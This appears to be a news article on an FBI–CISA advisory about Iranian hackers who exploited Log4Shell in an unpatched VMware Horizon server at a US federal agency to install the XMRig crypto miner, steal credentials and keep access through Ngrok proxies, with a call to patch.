The FBI and CISA have revealed a joint advisory stating that an unnamed Iranian hacker group has hacked the Federal Civilian Executive Branch (FCEB) to deploy the XMRig crypto mining malware by exploiting the Log4Shell vulnerability in an unpatched VMware Horizon server being used by the organisation.
The initial breach took place even earlier in February when attackers exploited the vulnerability tracked as CVE-2021-44228. It was detected during an incident response engagement at the agency between mid-June through mid-July earlier this year.
Outside of deploying the XMRig crypto miner, the threat group also moved laterally to the domain controller and compromised credentials. Additionally, the group set up Ngrok reverse proxies on the hacked servers to maintain persistence within the compromised agency’s network.
The advisory further states that any organisations that haven’t patched their VMware Horizon servers yet should assume that they’ve been breached and deploy the required countermeasures, including searching for malicious activity on their networks.
The CISA had already warned back in June this year that VMware Horizon and Unified Access Gateway servers were still being targeted by multiple threat actors, including state-sponsored hackers, to breach networks and move laterally once inside to access internal systems storing sensitive data.
The vulnerability was discovered by Alibaba Cloud’s security team first reported the bug to Apache on November 24, 2021. however, the first proof-of-concept exploit was published on GitHub on December 9, and threat actors have been actively scanning the internet for vulnerable targets since.
Following disclosure, the vulnerability turned out to be one of the worst security flaws ever discovered, with vulnerable versions being downloaded over four million times. The CISA (Cybersecurity and Infrastructure Agency) ordered federal civilian agencies to patch systems affected by the Log4Shell vulnerability by Christmas eve last year.
In the News: FTX hacker becomes 35th largest ETH holder; Crypto.com faces flak too